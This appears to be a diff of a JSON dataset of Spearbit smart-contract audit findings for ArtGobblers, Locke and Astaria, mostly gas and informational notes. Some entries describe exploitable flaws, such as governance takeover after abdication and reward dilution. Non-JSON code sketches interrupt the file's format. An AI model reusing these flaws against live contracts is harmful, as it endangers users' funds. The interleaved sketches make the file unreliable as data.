{ - "title": "Consider checking if the token fed to the Gobbler is a real ERC1155 or ERC721 token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The current implementation of the ArtGobblers.feedArt function lets users specify, via the bool isERC1155 input parameter, whether the id passed is from an ERC721 or an ERC1155 token. Without checking that the passed nft address fully supports ERC721 or ERC1155, these two problems could arise: The user can feed a Gobbler an arbitrary ERC20 token by calling gobblers.feedArt(1, address(goo), 100, false); in this example, we have fed 100 $GOO to the gobbler. By just implementing safeTransferFrom or transferFrom in a generic contract, the user can feed tokens that cannot later be rendered by a Dapp because they do not fully support the ERC721 or ERC1155 standard.", + "title": "Avoid shadowing variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The highlighted line declares a new variable owner which has already been defined in Auth.sol, inherited by LienToken: address owner = ownerOf(lienId);", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Rounding down in legendary auction leads to legendaryGobblerPrice being zero earlier than the auction interval", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The expression below rounds down. (startPrice * (LEGENDARY_AUCTION_INTERVAL - numMintedSinceStart)) / LEGENDARY_AUCTION_INTERVAL In particular, this expression has a value of 0 when numMintedSinceStart is between 573 and 581 (LEGENDARY_AUCTION_INTERVAL). For example, with startPrice = 69 and numMintedSinceStart = 573, the expression evaluates to (69 * 8) / 581 = 552 / 581, which truncates to 0 (a demo follows this block).", + "title": "PublicVault.accrue is manually inlined rather than called", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The _accrue function locks in the implied value of the PublicVault by calculating, then adding to yIntercept, and finally emitting an event. This calculation is duplicated in 3 separate locations in PublicVault: in totalAssets, in _accrue, and in updateVaultAfterLiquidation.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] },
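A minimal demo of the truncation discussed in the rounding finding above; the constants are taken from the report, the wrapper function is illustrative:

    function legendaryPriceNearIntervalEnd() external pure returns (uint256) {
        uint256 startPrice = 69;               // auction start price
        uint256 interval = 581;                // LEGENDARY_AUCTION_INTERVAL
        uint256 numMintedSinceStart = 573;
        // (69 * 8) / 581 == 552 / 581, which truncates to 0
        return (startPrice * (interval - numMintedSinceStart)) / interval;
    }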
"Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Missing natspec comments for contract's constructor, variables or functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "Some of the contract's constructor variables and functions are missing natespec comments. Here is the full list of them: Pages constructor Pages getTargetSaleDay function LibString toString function MerkleProofLib verify function SignedWadMath toWadUnsafe function SignedWadMath unsafeWadMul function SignedWadMath unsafeWadDiv function SignedWadMath wadMul function SignedWadMath wadDiv function SignedWadMath wadExp function SignedWadMath wadLn function SignedWadMath unsafeDiv function VRGDA constructor LogisticVRGDA constructor LogisticVRGDA getTargetDayForNextSale PostSwitchVRGDA constructor PostSwitchVRGDA getTargetDayForNextSale GobblerReserve artGobblers GobblerReserve constructor GobblersERC1155B contract is missing natspec's coverage for most of the variables and functions PagesERC721 contract is missing natspec's coverage for most of the variables and functions PagesERC721 isApprovedForAll should explicity document the fact that the ArtGobbler contract is always pre-approved ArtGobblers chainlinkKeyHash variable ArtGobblers chainlinkFee variable ArtGobblers constructor ArtGobblers gobblerPrice miss the @return natspec ArtGobblers legendaryGobblerPrice miss the @return natspec ArtGobblers requestRandomSeed miss the @return natspec ArtGobblers fulfillRandomness miss both the @return and @param natspec ArtGobblers uri miss the @return natspec ArtGobblers gooBalance miss the @return natspec ArtGobblers mintReservedGobblers miss the @return natspec ArtGobblers getGobblerEmissionMultiple miss the @return natspec 11 ArtGobblers getUserEmissionMultiple miss the @return natspec ArtGobblers safeBatchTransferFrom miss all natspec ArtGobblers safeTransferFrom miss all natspec ArtGobblers transferUserEmissionMultiple miss @notice natspec", + "title": "AstariaRouter has unnecessary access to setPayee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "LienToken.setPayee. setPayee is never called from AstariaRouter, but the router has access to call", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Potential issues due to slippage when minting legendary gobblers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The price of a legendary mint is a function of the number of gobblers minted from goo. Because of the strict check that the price is exactly equal to the number of gobblers supplied, this can lead to slippage issues. That is, if there is a transaction that gets mined in the same block as a legendary mint, and before the call to mintLegendaryGobbler, the legendary mint will revert. uint256 cost = legendaryGobblerPrice(); if (gobblerIds.length != cost) revert IncorrectGobblerAmount(cost);", + "title": "ClearingHouse can be deployed only when needed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When collateral is deposited, a Clearing House is automatically deployed. 
However, these Clearing Houses are only needed if the collateral goes to auction at Seaport, either through liquidation or the collateral holder choosing to sell them. The Astaria team has indicated that this behavior is intentional in order to put the cost on the borrower, since liquidations are already expensive. I'd suggest the perspective that all pieces of collateral will be added to the system, but a much smaller percentage will ever be sent to Seaport. The aggregate gas spent will be much, much lower if we are careful to only deploy these contracts as needed (a lazy-deployment sketch follows this block). Further, let's look at the two situations where we may need a Clearing House: 1) The collateral holder calls listForSaleOnSeaport(): In this case, the borrower is paying anyway, so it's a no-brainer. 2) Another user calls liquidate(): In this case, they will earn the liquidation fees, which should be sufficient to justify a small increase in gas costs.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Users who claim early have an advantage in goo production", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The gobblers are revealed in ascending order of the index in revealGobblers. However, there can be cases when this favours users who were able to claim early: 1. There is the trivial case where a user who claimed a day earlier will have an advantage in gooBalance as their emission starts earlier. 2. For users who claimed the gobblers on the same day (in the same period between a reveal) the advantage depends on whether the gobblers are revealed in the same block or not. 1. If there is a large number of gobbler claims between two aforementioned gobblers, then it may not be possible to call revealGobblers, due to the block gas limit. 2. A user at the beginning of the reveal queue may call revealGobblers for enough indices to reveal their gobbler early. In all of the above cases, the advantage is being early to start the emission of the Goo.", + "title": "PublicVault.claim() can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "For claim not to revert we would need to have msg.sender == owner(). And so when the following is called: _mint(owner(), unclaimed); Instead of owner() we can use msg.sender, since reading the immutable owner() requires some calldata lookup.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] },
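For the ClearingHouse finding above, a lazy-deployment sketch; the storage fields and clone arguments are assumptions, only ClonesWithImmutableArgs and the two call sites come from the surrounding findings:

    function _getOrDeployClearingHouse(uint256 collateralId) internal returns (address ch) {
        ch = s.clearingHouse[collateralId];            // hypothetical mapping
        if (ch == address(0)) {
            // deploy on first use instead of on every collateral deposit
            ch = ClonesWithImmutableArgs.clone(
                s.clearingHouseImpl,                   // hypothetical implementation pointer
                abi.encodePacked(address(this), collateralId)
            );
            s.clearingHouse[collateralId] = ch;
        }
    }
    // called only from listForSaleOnSeaport() and liquidate(), per the finding's two cases.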
{ - "title": "Add a negativity check for decayConstant in the constructor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "Price is designed to decay as time progresses. For this, it is important that the constant decayConstant is negative. Since the value is derived using an on-chain logarithm computation once, it is useful to check that the value is negative. Also, typically a decay constant is positive; for example, in radioactive decay the negative sign is explicitly added in the function. It is worth keeping the same convention here, i.e., keeping decayConstant as a positive number and adding the negative sign in the getPrice function. However, this may cause a small increase in gas and therefore may not be worth implementing in the end.", + "title": "Can remove incoming terms from LienActionBuyout struct", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Incoming terms are never used in the LienActionBuyout struct. The general flow right now is: incomingTerms are passed to VaultImplementation#buyoutLien. These incoming terms are validated and used to generate the lien information. The lien information is encoded into a LienActionBuyout struct. This is passed to LienToken#buyoutLien, but then the incoming terms are never used again.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Consideration on possible Chainlink integration concerns", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The ArtGobbler project relies on the Chainlink v1 VRF service to reveal minted gobblers and assign a random emissionMultiple that can range from 6 to 9. The project has estimated that minting and revealing all gobblers will take about 10 years. In the scenario simulated by the discussion \"Test to mint and reveal all the gobblers\" the number of requestRandomSeed and fulfillRandomness calls made to reveal all the minted gobblers was more than 1500. Given the timespan of the project, the number of requests made to Chainlink to request a random number, and the fundamental dependency on Chainlink VRF v1, we would like to highlight some concerns: What would happen if Chainlink completely discontinues Chainlink VRF v1? At the current moment, Chainlink has already released VRF v2, which replaces and enhances VRF v1. What would happen in case of a Chainlink service outage if for some reason they decide not to process previous requests? Currently, the ArtGobbler contract does not allow requesting a new \"request for randomness\". What if fulfillRandomness always gets delayed by a large number of days and users are not able to reveal their gobblers? This would not allow them to know the value of the gobbler (rarity and the visual representation) and start compounding $GOO, given the fact that the gobbler does not have an emission multiple associated yet. What if, by error or on purpose (malicious behavior), a Chainlink operator calls fulfillRandomness multiple times, changing the randomSeed during a reveal phase (the reveal of X gobblers can happen in multiple stages)?", + "title": "Refactor updateVaultAfterLiquidation to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In updateVaultAfterLiquidation, we check if we're within maxAuctionWindow of the end of the epoch. If we are, we call _deployWithdrawProxyIfNotDeployed and assign the result to withdrawProxyIfNearBoundary. We then proceed to check if withdrawProxyIfNearBoundary is assigned and, if it is, call handleNewLiquidation. Instead of checking separately, we can include this call within the block of code executed if we're within maxAuctionWindow of the end of the epoch. 
This is true because (a) the withdraw proxy will always be deployed by the end of that block and (b) the withdraw proxy will never be deployed if timeToEnd >= maxAuctionWindow (a consolidated sketch follows this block).", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "The function toString() does not return a string aligned to a 32-byte word boundary", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "It is a good practice to align memory regions to 32-byte word boundaries. This is not necessarily the case here. However, we do not think this can lead to issues.", + "title": "Use collateralId to set collateralIdToAuction mapping", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_listUnderlyingOnSeaport() sets the collateralIdToAuction mapping as follows: s.collateralIdToAuction[uint256(listingOrder.parameters.zoneHash)] = true; Since this function has access to collateralId, it can be used instead of using zoneHash.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] },
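For the updateVaultAfterLiquidation finding above, a sketch of the consolidated branch; the helper names come from the finding, the argument lists are assumptions:

    if (timeToEnd < maxAuctionWindow) {
        // deploy (or fetch) the proxy and notify it in the same guarded block
        address proxy = _deployWithdrawProxyIfNotDeployed(s, lienEpoch);
        WithdrawProxy(proxy).handleNewLiquidation(owed, maxAuctionWindow);
    }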
{ - "title": "Considerations on Legendary Gobbler price mechanics", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The auction price model is made in a way that starts from a startPrice and decays over time. Each time a new auction starts, the start price will be equal to max(69, prevStartPrice * 2). Users in this case are incentivized to buy the legendary gobbler as soon as the auction starts because by doing so they are going to burn the maximum allowed amount of gobblers, allowing them to maximize the final emission multiple of the minted legendary gobbler. By doing this, you reach the end goal of maximizing the account's $GOO emissions. By waiting, the cost of the legendary gobbler decays, and so does the attainable emission multiple (because you can burn fewer gobblers). This means that if a user has enough gobblers to burn, he/she will burn them as soon as the auction starts. Another reason to mint a legendary gobbler as soon as the auction starts (and so burn as many gobblers as possible) is to make the next auction starting price as high as possible (always for the same reason, to be able to maximize the legendary gobbler emission multiple). The next auction starting price is determined by legendaryGobblerAuctionData.startPrice = uint120(cost < 35 ? 69 : cost << 1); These mechanisms and behaviors can result in the following consequences: Users that have a huge number of gobblers will burn them as soon as possible, denying others that can't afford it the chance to wait for the price to decay. There will be fewer and fewer \"normal\" gobblers available to be used as part of the \"art\" aspect of the project. In the discussion \"Test to mint and reveal all the gobblers\" we have simulated a scenario in which a whale would be interested to collect all gobblers with the end goal of maximizing $GOO production. In that scenario, when the last Legendary Gobbler is minted we have estimated that 9644 gobblers have been burned to mint all the legendaries.", + "title": "Storage packing", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "RouterStorage: The RouterStorage struct represents state managed in storage by the AstariaRouter contract. Some of the packing in this struct is suboptimal. 1. maxInterestRate and minInterestBPS: These two values pack into a single storage slot; however, they are never referenced together outside of the constructor. This means that, when read from storage, there are no gas efficiencies gained. 2. Comments denoting storage slots do not match the implementation. The comment //slot 3 + for example occurs far after the 3rd slot begins, as the addresses do not pack together. LienStorage: 3. The LienStorage struct packs maxLiens with the WETH address into a single storage slot. While gas is saved on the constructor, extra gas is spent in parsing maxLiens on each read, as it is read alone. VaultData: 4. VaultData packs currentEpoch into the struct's first slot; however, it is more commonly read along with values from the struct's second slot.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Define a LEGENDARY_GOBBLER_INITIAL_START_PRICE constant to be used instead of hardcoded 69", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "69 is currently the starting price of the first legendary auction and will also be the price of the next auction if the previous one (that just finished) was lower than 35. There isn't any gas benefit to using a constant variable, but it would make the code cleaner and easier to read instead of having hard-coded values directly.", + "title": "ClearingHouse fallback can save WETH address to memory to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The fallback function reads WETH() from ROUTER three times. It can be read once and saved to memory for the subsequent uses (a caching sketch follows this block).", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] },
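For the WETH-caching finding above, a minimal sketch; the interface name is assumed, only ROUTER() and WETH() come from the finding:

    fallback() external payable {
        address weth = IAstariaRouter(ROUTER()).WETH(); // single external read
        // ... perform the subsequent transfers using the cached `weth` ...
    }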
{ - "title": "Update ArtGobblers comments about some variable/functions to make them more clear", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "Some comments about state variables or functions could be improved to make them clearer or remove any further doubts. LEGENDARY_AUCTION_INTERVAL /// @notice Legendary auctions begin each time a multiple of these many gobblers have been minted. It could make sense for this comment to specify \"minted from Goo\", otherwise someone could think that the \"free\" mints (mintlist, legendary, reserved) also count to determine when a legendary auction starts. EmissionData.lastTimestamp // Timestamp of last deposit or withdrawal. These comments should be updated to cover all the scenarios where lastBalance and lastTimestamp are updated. Currently, they are updated in many more cases, for example: mintLegendaryGobbler, revealGobblers, transferUserEmissionMultiple. getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) has an outdated comment. The line currently present in the mintLegendaryGobbler function has the following comment: getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) // Must be done before minting as the transfer hook will update the user's emissionMultiple. In both ArtGobblers and GobblersERC1155B there isn't any transfer hook, which could mean that the comment is referencing outdated code. We suggest removing or updating the comment to reflect the current code implementation. legendaryGobblerPrice numMintedAtStart calculation. The variable numMintedAtStart is calculated as (numSold + 1) * LEGENDARY_AUCTION_INTERVAL. The comment above the formula does not explain why it uses (numSold + 1) instead of numSold. This reason is correctly explained by a comment on the LEGENDARY_AUCTION_INTERVAL declaration. It would be better to also update the comment related to the calculation of numMintedAtStart to explain why the current formula uses (numSold + 1) instead of just numSold. transferUserEmissionMultiple The above utility function transfers an amount of a user's emission multiple to another user. Other than transferring that emission amount, it also updates both users' lastBalance and lastTimestamp. The natspec comment should be updated to cover this information.", + "title": "CollateralToken's onlyOwner modifier doesn't need to access storage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The onlyOwner modifier calls to ownerOf(), which loads storage itself to check ownership. We can save a storage load since we don't need to load the storage variables in the modifier itself.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Mark functions not called internally as external to improve code quality", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The following functions could be declared as external to save gas and improve code quality: Goo.mintForGobblers, Goo.burnForGobblers, Goo.burnForPages, GobblerReserve.withdraw", + "title": "Can stop loop early in _payDebt when everything is spent", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a loan is sold on Seaport and _payDebt is called, it loops through the auction stack and calls _paymentAH for each, decrementing the remaining payment as money is spent. This loop can be ended when payment == 0 (a sketch follows this block).", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] },
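For the _payDebt finding above, a sketch of the early exit; the _paymentAH signature is an assumption, only the loop-and-decrement shape comes from the finding:

    for (uint256 i; i < stack.length; ) {
        payment -= _paymentAH(s, stack[i], payment); // hypothetical signature
        if (payment == 0) break;                     // Seaport proceeds fully spent
        unchecked { ++i; }
    }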
}", + "title": "Can remove initializing allowList and depositCap for private vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Private Vaults do not allow enabling, disabling, or editing the allow list, and don't enforce a deposit cap, so seems strange to initialize these variables. Delegates are still included in the _validateCommitment function, so we can't get rid of this entirely.", "labels": [ "Spearbit", - "Locke", - "Severity: High Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Old governor can call acceptGov() after renouncing its role through _abdicate()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "The __abdicate function does not reset pendingGov value to 0. Therefore, if a pending governor is set the user can become a governor by calling acceptGov.", + "title": "ISecurityHook.getState can be modified to return bytes32 / hash of the state instead of the state itself.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Since only the keccak256 of preTransferState is checked against the kec- cak256 hash of the returned security hook state, we could change the design so that ISecurityHook.getState returns bytes32 to save gas. Unless there is a plan to use the bytes memory preTransferState in some other form as well.", "labels": [ "Spearbit", - "Locke", - "Severity: High Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "User can lose their reward due truncated division", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "The truncated division can cause users to lose rewards in this update round which may happen when any of the following conditions are true: 1. RewardToken.decimals() is too low. 2. Reward is updated too frequently. 3. StreamDuration is too large. 4. TotalVirtualBalance is too large (e.g., stake near the end of stream). This could potentially happen especially when the 1st case is true. Consider the following scenario: rewardToken.decimals() = 6. depositToken.decimals() can be any (assume its 18). rewardTokenAmount = 1K * 10**6. streamDuration = 1209600 (two weeks). totalVirtualBalance = streamDuration * depositTokenAmount / timeRemaining where depositToken- Amount = 100K 10**18 and timeRemaining = streamDuration (a user stakes 100K at the beginning of the stream) lastApplicableTime() - lastUpdate = 100 (about 7 block-time). Then rewards = 100 * 1000 * 10**6 * 10**18 / 1209600 / (1209600 * 100000 * 10**18 / 1209600) = 0.8267 < 1. User wants to buy the reward token at the price of 100K/1K = 100 deposit token but does not get any because of the truncated division. function rewardPerToken() public override view returns (uint256) { if (totalVirtualBalance == 0) { return cumulativeRewardPerToken; } else { // time*rewardTokensPerSecond*oneDepositToken / totalVirtualBalance uint256 rewards; unchecked { rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * ,! 
depositDecimalsOne) / streamDuration / totalVirtualBalance; } return cumulativeRewardPerToken + rewards; } }", + "title": "Define an endpoint for LienToken that only returns the liquidator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "It would save a lot of gas if LienToken had an endpoint that would only return the liquidator for a collateralId, instead of all the auction data.", "labels": [ "Spearbit", - "Locke", - "Severity: High Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "The streamAmt check may prolong a user in the stream", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Assume that the amount of tokens staked by a user (ts.tokens) is low. This check allows another person to deposit a large stake in order to prolong the user in a stream (until streamAmt for the user becomes non-zero). For this duration the user would be receiving a bad rate, or 0 altogether, for the reward token while being unable to exit from the pool. if (streamAmt == 0) revert ZeroAmount(); Therefore, if Alice stakes a small amount of deposit token and Bob comes along and deposits a very large amount of deposit token, it's in Alice's interest to exit the pool as early as possible, especially when this is an indefinite stream. Otherwise she would be receiving a bad rate for her deposit token.", + "title": "isValidRefinance and related storage parameters can be moved to LienToken", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "isValidRefinance is only used in LienToken, and with the current implementation it requires reading AstariaRouter from storage and performing a cross-contract call, which adds a lot of gas overhead.", "labels": [ "Spearbit", - "Locke", - "Severity: Medium Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "User can stake before the stream creator produced a funding stream", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Consider the following scenario: 1. Alice stakes in a stream before the stream starts. 2. Nobody funds the stream. 3. In the case of an indefinite stream, Alice loses some of her deposit depending on when she exits the stream. For a usual stream Alice will have her deposit tokens locked until endDepositLock.", + "title": "Simplify / optimize for loops", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In the codebase, sometimes there are for loops of the form: for (uint256 i = 0; ; i++) { } These for loops can be optimized (an optimized form is sketched after this block).", "labels": [ "Spearbit", - "Locke", - "Severity: Medium Risk" + "Astaria", + "Severity: Gas Optimization" ] },
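A common optimized loop shape, mirroring the unchecked increment already used in the codebase's _makePayment loop shown further below; the items array is illustrative:

    uint256 n = items.length;   // cache the length read
    for (uint256 i; i < n; ) {  // default-initialized i, no redundant `= 0`
        // ... loop body ...
        unchecked { ++i; }      // i < n bounds the increment, so overflow is impossible
    }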
{ - "title": "Potential funds locked due to low token decimals and long stream duration", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "In cases where the deposit token's decimals are too low (4 or less) or the remaining stream duration is too long, checking streamAmt > 0 may affect regular users. They could be temporarily blocked by the contract, i.e. they cannot stake, withdraw, or get rewards, and should wait until streamAmt > 0 or the stream ends. Although unlikely to happen, it is still a potential fund-lock issue. function updateStreamInternal() internal { ... if (acctTimeDelta > 0) { if (ts.tokens > 0) { uint112 streamAmt = uint112(uint256(acctTimeDelta) * ts.tokens / (endStream - ts.lastUpdate)); if (streamAmt == 0) revert ZeroAmount(); ts.tokens -= streamAmt; } ... }", + "title": "calculateSlope can be more simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "calculateSlope can be more simplified. owedAtEnd would be: owedAtEnd = amt + ((tend - tlast) * r * amt) / 10**18, where: amt is stack.point.amount, tend is stack.point.end, tlast is stack.point.last, r is stack.lien.details.rate. And so the returned value would need to be (r * amt) / 10**18 (a sketch follows this block).", "labels": [ "Spearbit", - "Locke", - "Severity: Medium Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Sanity check on the reward token's decimals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Add a sanity check on the reward token's decimals, which shouldn't exceed 33 because TokenStream.rewards has a uint112 type. constructor( uint64 _streamId, address creator, bool _isIndefinite, address _rewardToken, address _depositToken, uint32 _startTime, uint32 _streamDuration, uint32 _depositLockDuration, uint32 _rewardLockDuration, uint16 _feePercent, bool _feeEnabled ) LockeERC20( _depositToken, _streamId, _startTime + _streamDuration + _depositLockDuration, _startTime + _streamDuration, _isIndefinite ) MinimallyExternallyGoverned(msg.sender) // inherit factory governance { // No error code or msg to reduce bytecode size require(_rewardToken != _depositToken); // set fee info feePercent = _feePercent; feeEnabled = _feeEnabled; // limit feePercent require(feePercent < 10000); // store streamParams startTime = _startTime; streamDuration = _streamDuration; // set in shared state endStream = startTime + streamDuration; endDepositLock = endStream + _depositLockDuration; endRewardLock = startTime + _rewardLockDuration; // set tokens depositToken = _depositToken; rewardToken = _rewardToken; // set streamId streamId = _streamId; // set indefinite info isIndefinite = _isIndefinite; streamCreator = creator; uint256 one = ERC20(depositToken).decimals(); if (one > 33) revert BadERC20Interaction(); depositDecimalsOne = uint112(10**one); // set lastUpdate to startTime to reduce codesize and first users gas lastUpdate = startTime; }", + "title": "Break out of _makePayment for loop early when totalCapitalAvailable reaches 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In _makePayment we have the following for loop: for (uint256 i; i < n; ) { (newStack, spent) = _payment( s, stack, uint8(i), totalCapitalAvailable, address(msg.sender) ); totalCapitalAvailable -= spent; unchecked { ++i; } } When totalCapitalAvailable reaches 0 we still call _payment, which costs a lot of gas even though it only transfers 0 assets, removes and re-adds the same slope for a lien owner if it is a public vault, and performs other no-ops.", "labels": [ "Spearbit", - "Locke", - "Severity: Low Risk" + "Astaria", + "Severity: Gas Optimization" ] },
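For the calculateSlope finding above, a sketch of the simplified implementation; the struct layout is inferred from the field names in the finding:

    function calculateSlope(ILienToken.Stack memory stack) public pure returns (uint256) {
        // slope = (owedAtEnd - amt) / (tend - tlast) == (rate * amt) / 10**18
        return (stack.lien.details.rate * stack.point.amount) / 1e18;
    }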
payee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "payee in _buyoutLien can be reused to save some gas", "labels": [ "Spearbit", - "Locke", - "Severity: Low Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Potential issue with malicious stream creator", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Assume that users staked tokens at the beginning. The malicious stream creator could come and stake an extremely large amount of tokens thus driving up the value of totalVirtualBalance. This means that users will barely receive rewards while giving away deposit tokens at the same rate. Users can exit the pool in this case to save their unstreamed tokens. 13 function rewardPerToken() public override view returns (uint256) { if (totalVirtualBalance == 0) { return cumulativeRewardPerToken; } else { unchecked { rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * ,! depositDecimalsOne) / streamDuration / totalVirtualBalance; } return cumulativeRewardPerToken + rewards; } }", + "title": "isValidRefinance and related storage parameters can be moved to LienToken", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "isValidRefinance is only used in LienToken and with the current implementation it requires reading AstariaRouter from the storage and performing a cross-contract call which would add a lot of overhead gas cost.", "labels": [ "Spearbit", - "Locke", - "Severity: Low Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Moving check require(feePercent < 10000) in updateFeeParams to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "feePercent comes directly from LockeFactorys feeParams.feePercent, which is configured in the updateFeeParams function and used across all Stream contracts. Moving this check into the updateFeeParams function can avoid checking in every contract and thus save gas.", + "title": "auctionWindowMax can be reused to optimize liquidate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are mutiple instances of s.auctionWindow + s.auctionWindowBuffer in the liquidate func- tion which would make the function to read from the storage twice each time. Also there is already a stack variable auctionWindowMax defined as the sum which can be reused.", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Use calldata instead of memory for some function parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Having function arguments in calldata instead of memory is more optimal in the aforementioned cases. See the following reference.", + "title": "fileBatch() does requiresAuth for each file separately", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "fileBatch() does a requiresAuth check and then for each element in the input array calls file() which does another requiresAuth check. function fileBatch(File[] calldata files) external requiresAuth { for (uint256 i = 0; i < files.length; i++) { file(files[i]); } } ... 
